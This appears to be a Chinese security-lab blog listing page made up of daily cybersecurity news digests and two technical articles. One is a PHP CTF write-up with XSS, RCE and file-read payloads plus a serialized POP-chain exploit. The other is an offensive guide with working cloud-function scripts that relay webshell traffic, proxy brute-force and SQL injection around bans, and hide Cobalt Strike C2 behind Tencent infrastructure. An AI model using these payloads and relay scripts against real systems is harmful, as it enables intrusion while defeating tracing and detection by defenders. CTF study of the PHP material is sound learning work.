网络安全日报 2021年11月03日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Facebook 表示将关闭其面部识别系统并删除数据 https://www.securityweek.com/facebook-shut-down-face-recognition-system-delete-data 2、FBI 发布 Hello Kitty 勒索软件的 IOC https://www.securityweek.com/fbi-publishes-iocs-hello-kitty-ransomware 3、谷歌将发现Linux 内核中提权漏洞的赏金提高了三倍 https://securityaffairs.co/wordpress/124094/hacking/google-bug-bounty-linux-kernel-exploits.html 4、互联网上公开的GitLab有50%仍然受RCE漏洞的影响 https://securityaffairs.co/wordpress/124088/hacking/gitlab-rce.html 5、Pentaho 商业分析软件中存在严重漏洞 https://thehackernews.com/2021/11/critical-flaws-uncovered-in-pentaho.html 6、Android 11 月补丁修复了多个严重漏洞 https://www.bleepingcomputer.com/news/security/android-november-patch-fixes-actively-exploited-kernel-bug 7、巴基斯坦国有商业银行后端系统遭受破坏性攻击 https://therecord.media/destructive-cyberattack-hits-national-bank-of-pakistan/ 8、卡巴斯基修补了可能导致系统无法启动的漏洞 https://www.securityweek.com/kaspersky-patches-vulnerability-can-lead-unbootable-system 9、新的鱼叉式网络钓鱼活动窃取Office 365凭据 https://support.kaspersky.com/general/vulnerability.aspx?el=12430#01112021_phishing 10、电信堆栈软件FreeSwitch中存在5个安全漏洞 https://portswigger.net/daily-swig/multiple-flaws-in-telecoms-stack-software-freeswitch-uncovered
记一道2021浙江省赛的Web题
https://www.yijinglab.com/pages/CTFLaboratory.jsp 前景: 刚刚结束的浙江省网络安全大赛,其中Web类的第二题考察了POP链以及原生类的利用,在比赛期间只构造了POP链、得到flag的文件名,但是并没有利用原生类将flag文件完整读出来。这篇文章将会把这个题涉及到的知识点复现一遍,并且给出这个题详细的WP。 原生类: 报错类 Error 在PHP7版本中,因为Error中带有__toString方法,该方法会将传入给__toString的参数原封不动的输出到浏览器。在这么一个过程中可能会产生XSS。 例如,有以下代码: <?php $a = $_GET['a']; $b = $_GET['b']; echo new $a($b); 当传入下方payload的时候,会产生XSS ?a=Error&b=<script>alert("Lxxx");</script> Exception 与Error类似,Exception同样有__toString方法,因此测试代码和上方一样,传入以下payload,同样可以XSS。 ?a=Exception&b=<script>alert("Lxxx");</script> 这个时候可能就会有聪明又帅气的师傅们问了,那既然是会被PHP执行,那么可不可以往里面传一句话木马呢? 同样还是上方的测试代码,我们传以下payload: ?a=Exception&b=eval($_POST[1]); 可以看到,传入的一句话木马被原封不动的打印出来,因此在上方这种测试代码中,无法RCE。 不过如果将测试代码换一个写法,那么就可以RCE,我们将测试代码修改如下: <?php $a = $_GET['a']; $b = $_GET['b']; eval("echo new $a($b());"); 这个时候我们传入以下payload ?a=Exception&b=system('whoami') 这个时候虽然报错了,但是仍然可以RCE,RCE的主要原因不是Exception这个类,而是因为PHP会先执行括号内的内容,如果执行括号内的内容没有报错,再执行括号外的报错,没有报错的部分的命令同样被正常执行。因此如果将上方测试代码的第四行eval删去,则无法进行RCE。 遍历目录类 DirectoryIterator DirectoryIterator类的__construct方法会构造一个迭代器,如果使用echo输出该迭代器,将会返回迭代器的第一项 假设我们有以下代码: <?php $a = $_GET['a']; $b = $_GET['b']; echo new $a($b); 这个时候我们传参如下: ?a=DirectoryIterator&b=. 在页面中返回了一个点(真的是一个点,不是显示屏上的污渍) 这个点代表是当前目录,如果我们想要匹配其余文件,可以使用glob协议 ?a=DirectoryIterator&b=glob://flag* 那么这个时候又有聪明又帅气的师傅要问了,如果这个时候不知道flag文件名怎么办? 答案是:暴力搜索 ?a=DirectoryIterator&b=glob://f[k-m]* glob协议同样是支持通配符,包括ascii码中的部分匹配,例如想要匹配大写字母,那么就写[@-[]表示ASCII码字符从@到[都允许匹配,也就是匹配大写字母。 FilesystemIterator 同样的,如果DirectoryIterator类因为奇奇怪怪的原因被禁用了,还有FilesystemIterator类可以代替,使用方法和DirectoryIterator类差不多,这里就不过多赘述。 GlobIterator GlobIterator和上方这两个类差不多,不过glob是GlobIterator类本身自带的,因此在遍历的时候,就不需要带上glob协议头了,只需要后面的相关内容 ?a=GlobIterator&b=f[k-m]* 读取文件类 SplFileObject SplFileObject类为文件提供了一个面向对象接口 说句人话就是这个类可以用来读文件,具体怎么读呢?下面做个测试。 同样还是这个测试代码: <?php $a = $_GET['a']; $b = $_GET['b']; echo new $a($b); 我们传payload如下: ?a=SplFileObject&b=flag.php 利用这个类可以将我们的flag.php文件读出来 不过有细心又帅气的师傅要问了,你这怎么就读了一行啊,还读了一个假的flag,你这SplFileObject保熟嘛? 确实,SplFileObject这个类返回的仍然是一个迭代器,想要将内容完整的输出出来,最容易想到的自然是利用foreach遍历,不过还有没有其他方法将其读取出来呢? 我们先看官方文档,看看SplFileObject类的__construct方法到底是怎么样的? 可以看到,要求我们传入的参数是一个文件名,参数是文件名的方法联想到了什么?还有哪些方法是需要传入文件名的?(require,include,file_get_contents,file_put_contents等等等等) 而这些方法都有一个共同点就是,可以用伪协议。 虽然官方文档上没有说(也可能是因为我没看到),但是我们还是可以大胆的猜想,SplFileObject可以使用伪协议。 因此我们传入payload: ?a=SplFileObject&b=php://filter/convert.base64-encode/resource=flag.php 可以看到,这个时候flag.php就被我们完整的读取出来了。 其余类 本质上不能说是其余类,不过在文章的后半部分会讲解今年浙江网安省赛其中一道web题,其余没有在这道题中用到的原生类我就不在这里赘述了,给个类名让师傅们参考参考。 ReflectionMethod ReflectionClass SoapClient SimpleXMLElement ZipArchive 2021浙江网络安全省赛Web2的WP 题目代码如下: <?php error_reporting(0); class A1{    public $tmp1;    public $tmp2;    public function __construct()   {        echo "Enjoy Hacking!";   }    public function __wakeup()   {        $this->tmp1->hacking();   } } class A2 {    public $tmp1;    public $tmp2;    public function hacking()   {        echo "Hacked By Bi0x";   } } class A3 {    public $tmp1;    public $tmp2;    public function hacking()   {        $this->tmp2->get_flag();   } } class A4 {    public $tmp1='1919810';    public $tmp2;    public function get_flag()   {        echo "flag{".$this->tmp1."}";   } } class A5 {    public $tmp1;    public $tmp2;    public function __call($a,$b)   {        $f=$this->tmp1;        $f();   } } class A6 {    public $tmp1;    public $tmp2;    public function __toString()   {        $this->tmp1->hack4fun();        return "114514";   } } class A7 {    public $tmp1="Hello World!";    public $tmp2;    public function __invoke()   {        echo "114514".$this->tmp2.$this->tmp1;   } } class A8 {    public $tmp1;    public $tmp2;    public function hack4fun()   {        echo "Last step,Ganbadie~";        if(isset($_GET['DAS']))       {            $this->tmp1=$_GET['DAS'];       }        if(isset($_GET['CTF']))       {            $this->tmp2=$_GET['CTF'];       }        echo new $this->tmp1($this->tmp2);   } } if(isset($_GET['DASCTF'])) {    unserialize($_GET['DASCTF']); } else{    highlight_file(__FILE__); } 这道题的前半部分是POP链的相关内容,由于POP链不在这篇文章涉及到的知识点范围之内,因此就简略一点,直接给出我在做题的时候写的思路以及POC <?php class A1{    public $tmp1;    public $tmp2;    public function __construct()   { $this->tmp1 = new A3();        echo "Enjoy Hacking!"."<br/>";   }    public function __wakeup()   {        $this->tmp1->hacking();   } } class A2 {    public $tmp1;    public $tmp2;    public function hacking()   {        echo "Hacked By Bi0x";   } } class A3 {    public $tmp1;    public $tmp2; public function __construct() { $this->tmp2 = new A4(); }    public function hacking()   {        $this->tmp2->get_flag();   } } class A4 {    public $tmp1;    public $tmp2; public function __construct() { $this->tmp1 = new A6(); }    public function get_flag()   {        echo "flag{".$this->tmp1."}";   } } class A5 {    public $tmp1 = "";    public $tmp2;    public function __call($a,$b)   {        $f=$this->tmp1;        $f();   } } class A6 {    public $tmp1;    public $tmp2; public function __construct() { $this->tmp1 = new A8(); }    public function __toString()   {        $this->tmp1->hack4fun();        return "114514";   } } class A7 {    public $tmp1="Hello World!";    public $tmp2;    public function __invoke()   {        echo "114514".$this->tmp2.$this->tmp1;   } } class A8 {    public $tmp1 ;    public $tmp2 ;    public function hack4fun()   {        echo "Last step,Ganbadie~";        if(isset($_GET['DAS']))       {            $this->tmp1=$_GET['DAS'];       }        if(isset($_GET['CTF']))       {            $this->tmp2=$_GET['CTF'];       }        echo new $this->tmp1($this->tmp2);   } } $a = new A1(); echo urlencode(serialize($a)); 得到部分payload: O%3A2%3A%22A1%22%3A2%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A3%22%3A2%3A%7Bs%3A4%3A%22tmp1%22%3BN%3Bs%3A4%3A%22tmp2%22%3BO%3A2%3A%22A4%22%3A2%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A6%22%3A2%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A8%22%3A2%3A%7Bs%3A4%3A%22tmp1%22%3BN%3Bs%3A4%3A%22tmp2%22%3BN%3B%7Ds%3A4%3A 将上方的payload传入DASCTF参数即可 这个时候当字符串反序列化到A8这个类中,需要我们传入DAS以及CTF参数,其中关键代码如下: echo new $this->tmp1($this->tmp2); 因此我们先把flag文件名找出来,我们可以利用DirectoryIterator类结合glob遍历目录,得到flag文件名为flaggggggggggg.php ?DAS=DirectoryIterator&CTF=glob://flag* 得到文件名之后就读取文件,利用SplFileObject类结合伪协议读取flaggggggggggg.php文件 ?DASCTF=O%3A2%3A%22A1%22%3A2%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A3%22%3A2%3A%7Bs%3A4%3A%22tmp1%22%3BN%3Bs%3A4%3A%22tmp2%22%3BO%3A2%3A%22A4%22%3A2%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A6%22%3A2%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A8%22%3A2%3A%7Bs%3A4%3A%22tmp1%22%3BN%3Bs%3A4%3A%22tmp2%22%3BN%3B%7D 最终再将浏览器的回显进行base64解码即可得到flag
网络安全日报 2021年11月02日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、谷歌推出新的开源数据隐私协议 https://www.securityweek.com/google-introduces-new-open-source-data-privacy-protocol 2、Android 恶意软件"AbstractEmu"可获取Root权限 https://www.securityweek.com/tens-thousands-download-abstractemu-android-rooting-malware 3、研究人员发现一种新的攻击利用Unicode在源码中隐藏漏洞 https://www.trojansource.codes/ 4、微软警告针对云帐户的密码喷射攻击正在增加 https://www.bleepingcomputer.com/news/microsoft/microsoft-warns-of-rise-in-password-sprays-targeting-cloud-accounts/ 5、GoCD 修补了高危身份验证漏洞 https://www.securezoo.com/2021/10/gocd-patches-highly-critical-authentication-vulnerability 6、谷歌、Salesforce 等联手启动 MVSP 安全基线项目 https://portswigger.net/daily-swig/google-salesforce-others-team-up-to-launch-mvsp-security-baseline-project 7、Balikbayan Foxes 组织冒充菲律宾政府传播RAT https://securityaffairs.co/wordpress/124017/apt/balikbayan-foxes-campaings.html 8、多伦多交通委员会披露遭到了勒索软件攻击 https://www.cbc.ca/news/canada/toronto/ttc-ransomware-attack-1.6231349 9、研究人员发现基于Golang的勒索软件DECAF https://blog.morphisec.com/decaf-ransomware-a-new-golang-threat-makes-its-appearance 10、警方逮捕造成全球1800起攻击事件的黑客嫌疑人 https://thehackernews.com/2021/10/police-arrest-suspected-ransomware.html
网络安全日报 2021年11月01日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、谷歌发布紧急 Chrome 更新补丁 修复两个被利用的0Day 漏洞 https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html 2、与伊朗有关的黑客入侵以色列互联网公司 https://www.securityweek.com/apparent-iran-linked-hackers-breach-israeli-internet-firm 3、MITRE 和 CISA 公布 2021 年最常见硬件漏洞清单 https://www.securityweek.com/mitre-cisa-announce-2021-list-most-common-hardware-weaknesses 4、Conti 勒索软件团伙攻击了顶级珠宝商Graff https://securityaffairs.co/wordpress/123980/cyber-crime/conti-ransomware-graff-jeweller.html 5、Hive勒索软件出现新变种可以加密Linux核FreeBSD https://securityaffairs.co/wordpress/123931/malware/hive-ransomware-linux-freebsd.html 6、巴布亚新几内亚财政部遭勒索软件攻击 https://securityaffairs.co/wordpress/123927/cyber-crime/papua-new-guinea-ransomware.html 7、 Android间谍软件FakeCop伪装成防病毒软件在日本传播 https://www.bleepingcomputer.com/news/security/android-spyware-spreading-as-antivirus-software-in-japan/ 8、苹果修复了macOS中的安全功能绕过漏洞 https://www.helpnetsecurity.com/2021/10/29/cve-2021-30892/ 9、配置错误的数据库泄露了超过8.8亿条医疗记录 https://www.websiteplanet.com/blog/deep6-leak-report/ 10、REvil和SolarMarker利用SEO中毒传播攻击载荷 https://cyware.com/news/revil-and-solarmarker-employ-seo-poisoning-attacks-4ea4f2ca
网络安全日报 2021年10月29日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、思科修补 ASA、FTD 软件中的高危 DoS 漏洞 https://www.securityweek.com/cisco-patches-high-severity-dos-vulnerabilities-asa-ftd-software 2、FBI 发布 Ranzy Locker 勒索软件 IOC https://www.securityweek.com/fbi-publishes-indicators-compromise-ranzy-locker-ransomware 3、严重的 GoCD 身份验证漏洞可导致供应链攻击 https://www.securityweek.com/critical-gocd-authentication-flaw-exposes-software-supply-chain 4、美国以国家安全为由禁止中国电信在该国运营 https://www.securityweek.com/us-bans-china-telecom-over-national-security-concerns 5、微软安全研究员在 macOS 中发现 Shrootless 漏洞,可绕过SIP https://securityaffairs.co/wordpress/123898/hacking/macos-shrootless-cve-2021-30892-flaw.html 6、超100万个网站受OptinMonster 插件漏洞影响 https://securityaffairs.co/wordpress/123886/hacking/wordpress-optinmonster-plugin-flaws.html 7、研究人员发现新的恶意软件加载程序-Wslink https://securityaffairs.co/wordpress/123878/malware/wslink-loader.html 8、德国调查人员确定了一名 REvil 勒索软件团伙核心成员 https://www.bleepingcomputer.com/news/security/german-investigators-identify-revil-ransomware-gang-core-member 9、用于签署欧盟数字 Covid 证书的私钥遭泄露 https://www.bleepingcomputer.com/news/security/eu-investigating-leak-of-private-key-used-to-forge-covid-passes/ 10、攻击者从 Cream Finance DeFi 平台窃取了1.3亿美金资产 https://securityaffairs.co/wordpress/123861/cyber-crime/cream-finance-cyber-heist-130m.html
网络安全日报 2021年10月28日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、黑客使用 Squirrelwaffle Loader 部署 Qakbot 和 Cobalt Strike https://thehackernews.com/2021/10/hackers-using-squirrelwaffle-loader-to.html 2、恶意 Firefox 附加组件阻止浏览器下载安全更新 https://thehackernews.com/2021/10/malicious-firefox-add-ons-block-browser.html 3、富士电机修补工厂监控软件中的漏洞 https://www.securityweek.com/fuji-electric-patches-vulnerabilities-factory-monitoring-software 4、苹果发布iOS 15.1 补丁修复了 iPhone 的 22 个安全漏洞 https://www.securityweek.com/apple-patches-22-security-flaws-haunting-iphones 5、 Avast 发布了 AtomSilo 和 LockFile 勒索软件解密器 https://securityaffairs.co/wordpress/123854/malware/atomsilo-lockfile-ransomware-decryptor.html 6、Grief 勒索软件攻击了美国全国步枪协会 (NRA) https://securityaffairs.co/wordpress/123849/cyber-crime/grief-ransomware-hit-nra.html 7、TA551 使用 Silver Red-Teaming 工具渗透网络 https://cyware.com/news/ta551-using-silver-red-teaming-tool-to-penetrate-networks-e5c83e78 6、Squid Game壁纸应用程序被用于传播Joker恶意软件 https://www.financialexpress.com/industry/technology/beware-squid-game-app-caught-infecting-android-devices-check-details/2356500/ 7、英国VoIP提供商Voipfone再次遭受DDoS攻击 https://www.ispreview.co.uk/index.php/2021/10/voip-provider-voipfone-uk-knocked-out-by-ddos-attack-again.html 8、多国联合执法逮捕了150名在暗网从事非法商品交易的嫌犯 https://www.securityweek.com/150-people-arrested-us-europe-darknet-drug-probe 9、一项调查显示过去一年,72%的组织受到过DNS攻击 https://www.helpnetsecurity.com/2021/10/26/organizations-dns-attacks/ 10、美国政府要求谷歌跟踪搜索某些关键词的人 https://www.dailymail.co.uk/news/article-10063665/Government-orders-Google-track-searching-certain-names-addresses-phone-numbers.html
网络安全日报 2021年10月27日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Adobe 修补了 14 种软件产品中存在的安全漏洞 https://www.securityweek.com/adobe-patches-gaping-security-flaws-14-software-products 2、ZDI 宣布 Pwn2Own Miami 竞赛的目标和奖品 https://www.securityweek.com/targets-and-prizes-announced-2022-ics-themed-pwn2own 3、FBI发布警报称Ranzy Locker 勒索软件已攻击了数十家美国公司 https://securityaffairs.co/wordpress/123801/cyber-crime/ranzy-locker-ransomware.html 4、UltimaSMS 订阅欺诈活动针对数百万 Android 用户 https://securityaffairs.co/wordpress/123795/malware/ultimasms-massive-fraud-campaign.html 5、研究人员发现APT 组织Lazarus 转向 IT 供应链攻击 https://threatpost.com/lazarus-apt-it-supply-chain/175772/ 6、伊朗各地加油站遭受网络攻击 https://therecord.media/suspected-cyberattack-temporarily-disrupts-gas-stations-across-iran 7、 EntroLink VPN 设备中的零日漏洞被勒索软件利用 https://therecord.media/ransomware-gangs-are-abusing-a-zero-day-in-entrolink-vpn-appliances 8、英国超市特易购的网站和应用程序遭受网络攻击 https://www.bbc.com/news/business-59027423 9、Gummy Browsers攻击可收集用户的浏览器指纹信息 https://cyware.com/news/gummy-browsers-attack-lets-hackers-spoof-your-digital-identity-eaf11598 10、Magnitude EK 利用基于 Chromium 的浏览器漏洞 https://cyware.com/news/magnitude-ek-exploiting-chromium-based-browser-flaws-93e9aec3
云函数(变相代理池)的三种常见利用
前言 之前学到一些云函数的利用,感觉很有趣,于是借此篇来总结一下三种对云函数的简单利用方式。 云函数 云函数(Serverless Cloud Function,SCF)是腾讯云为企业和开发者们提供的无服务器执行环境,帮助您在无需购买和管理服务器的情况下运行代码。您只需使用平台支持的语言编写核心代码并设置代码运行的条件,即可在腾讯云基础设施上弹性、安全地运行代码。SCF 是实时文件处理和数据处理等场景下理想的计算平台。总结云函数的几个特性: 多出口 调用时创建执行 无需服务器VPS承载 防溯源连接Webshell 之前最好的是某安全攻防实验室公众号发布了一篇<论如何防溯源连接Webshell>,利用云函数多出口的特性来规避溯源,可惜的是不久后就该文章就被删除了。以下介绍实际的利用方式 云函数创建 选择自定义创建 函数代码中脚本如下,主要是通过将Webshell地址作为参数传入云函数API中,在云函数服务端脚本中重组Webshell地址以及POST命令内容,将重组后的请求内容转发给Webshel #!/usr/bin/env # -*- coding:utf-8 -*- import requests import json from urllib.parse import urlsplit def geturl(urlstr):        jurlstr = json.dumps(urlstr)        dict_url = json.loads(jurlstr)        return dict_url['u'] def main_handler(event, context):        url = geturl(event['queryString'])        host = urlsplit(url).netloc        postdata = event['body']        headers=event['headers']        headers["HOST"] = host        resp=requests.post(url,data=postdata,headers=headers,verify=False)        response={        "isBase64Encoded": False,        "statusCode": 200,        "headers": {'Content-Type': 'text/html;charset='+resp.apparent_encoding},        "body": resp.text   }        return response 在触发器配置中选择API网关触发,然后点击创建,过一会会提示创建成功。 利用 我们可以通过蚁剑直接连接Webshell,URL请求地址填为api地址+webshell地址 https://service-dafetmeh-xxxx/release/Webshell_Bypass?u=http://xxxx/webshell.php  然后vps端通过监控日志查看访问webshell的ip地址 通过access.log可以发现每次请求都是不同的ip地址并且都是来自上海地区的腾讯云(根据自己选择地区而改变)  通过云函数的方法我们便可以隐藏连接Webshell的本机IP地址,从而防止溯源,如果使用可以蚁剑,为了达到更隐秘的目的,可以自行对Webshell流量进行加解密的操作来逃逸流量检测,流量检测+白名单IOC的方式可以完美的逃避检测。 注入/目录爆破爆破防Ban 云函数其实也可以作为一种变相的代理池供我们所用,利用云函数的多出口性来防止爆破或者SQL注入的时候被Ban 云函数创建 这里可以哈希安全团队公开的SCF-Proxy来实现,第一次看到Scf-Proxy的概念的应该是学蚁致用的作者,通过客户端监听获取请求并且组装API请求,服务端云函数解析且重组API请求,通过SCF-Proxy不光可以实现代理http请求,也可以代理https请求(类似Burp中间人监听的方式) 项目地址:https://github.com/hashsecteam/scf-proxy  下载下来然后利用Golang编译客户端和服务端,这里我把客户端编译成Win版本使用 还是选择自定义创建,但是这里要选择Go,而不是默认的python,并,执行方法改为server,且选择本地上传zip,将server.zip上传上去 触发管理中依然选择API网关管理,创建完成后来到触发管理获取API地址 利用 首先客户端开启监听 ./client.exe -port 10086 云函数api地址 此时再通过dirsearch设置http代理的方式爆破VPS的目录  查看access_log可以看到爆破的ip地址分布 由于此次选择的是广州地区,于是访问的ip基本都是来自广州  也可以代理访问https网站 由此可以实现爆破目录以及Sqlmap的爆破不被Ban C2隐藏 通过云函数的特性,我们依然可以做到CS上线的隐藏,由于Cs支持HTTP/HTTPS类型的Beacon,因此我们也可以通过云函数来转发HTTP/HTTPS请求,该方法学习自狼组北美第一突破手师傅 云函数创建 与第一种别无二样,依然选择API网关触发的方式,就是云函数服务端脚本修改为如下 # -*- coding: utf8 -*- import json,requests,base64 def main_handler(event, context):    C2='http://<C2服务器地址>' # 这里可以使用 HTTP、HTTPS~下角标~    path=event['path']    headers=event['headers']    print(event)    if event['httpMethod'] == 'GET' :        resp=requests.get(C2+path,headers=headers,verify=False)    else:        resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)        print(resp.headers)        print(resp.content)    response={        "isBase64Encoded": True,        "statusCode": resp.status_code,        "headers": dict(resp.headers),        "body": str(base64.b64encode(resp.content))[2:-1]   }    return response Cs可以定制Profile来更加隐匿流量这里使用如下的Profile set sample_name "kris_abao"; set sleeptime "3000"; set jitter   "0"; set maxdns   "255"; set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)"; http-get {   set uri "/api/getit";   client {       header "Accept" "*/*";       metadata {           base64;           prepend "SESSIONID=";           header "Cookie";       }   }   server {       header "Content-Type" "application/ocsp-response";       header "content-transfer-encoding" "binary";       header "Server" "Nodejs";       output {           base64;           print;       }   } } http-stager {     set uri_x86 "/vue.min.js";   set uri_x64 "/bootstrap-2.min.js"; } http-post {   set uri "/api/postit";   client {       header "Accept" "*/*";       id {           base64;           prepend "JSESSION=";           header "Cookie";       }       output {           base64;           print;       }   }   server {       header "Content-Type" "application/ocsp-response";       header "content-transfer-encoding" "binary";       header "Connection" "keep-alive";       output {           base64;           print;       }   } } 创建完后放到将api.profile放到服务端Cs上可以通过c2lint检查一下profile,可以看到正常的定义http类型Beacon的get和post请求时的样子 监听设置 生成木马,点击后上线 公网地址会不断的跳,因为这里呈现的是请求源的IP,也就是我们的云函数IP地址,基本都是腾讯的IDC机房中的IP 在该过程中遇到了一些问题,比如说Stager较大,导致请求超时,这时候可以修改代码加点演示设置即可。
网络安全日报 2021年10月26日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、研究人员发现Polygon 中的严重漏洞获得 200 万美元奖励 https://www.securityweek.com/researcher-earns-2-million-critical-vulnerability-polygon 2、微软警告称与俄有关的APT组织持续进行IT供应链攻击 https://securityaffairs.co/wordpress/123754/apt/nobelium-apt-it-supply-chain.html 3、一个未知勒索团伙利用 BillQuick 中的SQL注入进行攻击 https://securityaffairs.co/wordpress/123783/cyber-crime/ransomware-gang-billquick-web-suite-bug.html 4、Discourse 存在严重远程代码执行漏洞 https://securityaffairs.co/wordpress/123775/hacking/discourse-rce.html 5、研究人员发现爱立信 OSS-RC 组件中两个严重漏洞 https://securityaffairs.co/wordpress/123764/security/ericsson-oss-rc-flaws.html 6、Emsisoft 发布了BlackMatter 勒索软件解密器 https://securityaffairs.co/wordpress/123736/security/blackmatter-decryptor-pat-victims.html 7、韩国电信公司KT遭受DDoS攻击导致网络瘫痪 https://www.zdnet.com/article/large-ddos-attack-shuts-down-south-korean-telcos-nationwide-network/ 8、Groove勒索软件呼吁同行联合打击美国政府 https://securityaffairs.co/wordpress/123684/malware/groove-ransomware-gang-call-to-action.html 9、报告称东京奥运会期间遭4.5 亿次网络攻击 https://www.zdnet.com/article/nearly-450-million-cyberattacks-attempted-on-japan-olympics-infrastructure-ntt 10、 微软发现钓鱼工具TodayZoo 被广泛用于证书窃取攻击 https://securityaffairs.co/wordpress/123729/cyber-crime/todayzoo-phishing-kit.html
网络安全日报 2021年10月25日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、npm包UAParser.js遭供应链攻击被植入恶意挖矿软件 https://www.securityweek.com/critical-severity-warning-malware-embedded-popular-javascript-library 2、Facebook 推出用于查找 SSRF 漏洞的新工具 https://www.securityweek.com/facebook-introduces-new-tool-finding-ssrf-vulnerabilities 3、北约发布首个人工智能战略 https://securityaffairs.co/wordpress/123715/security/nato-strategy-artificial-intelligence.html 4、有人在黑客论坛出售 5000 万莫斯科司机的数据 https://securityaffairs.co/wordpress/123711/data-breach/moscow-drivers-data-leak.html 5、思科修复了 SD-WAN 中的操作系统命令注入漏洞 https://securityaffairs.co/wordpress/123704/security/cisco-sd-wan-flaw.html 6、FIN7 黑客组织创建虚假的网络安全公司招人进行勒索攻击 https://securityaffairs.co/wordpress/123673/cyber-crime/fin7-fake-cybersecurity-firm.html 7、美国执法部门入侵并破坏了 REvil 勒索团伙的服务器 https://www.securityweek.com/revil-ransomware-gang-hit-law-enforcement-hack-back-operation 8、谷歌推出 Android Enterprise 漏洞赏金计划 https://www.bleepingcomputer.com/news/security/google-launches-android-enterprise-bug-bounty-program/ 9、工业公司AUVESY的Versiondog数据管理产品存在多个严重漏洞 https://www.securityweek.com/critical-vulnerabilities-found-auvesy-product-used-major-industrial-firms 10、TodayZoo网络钓鱼活动仿冒Microsoft 365登录页面 https://www.zdnet.com/article/this-frankensteins-monster-of-a-phishing-campaign-is-after-your-passwords/
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页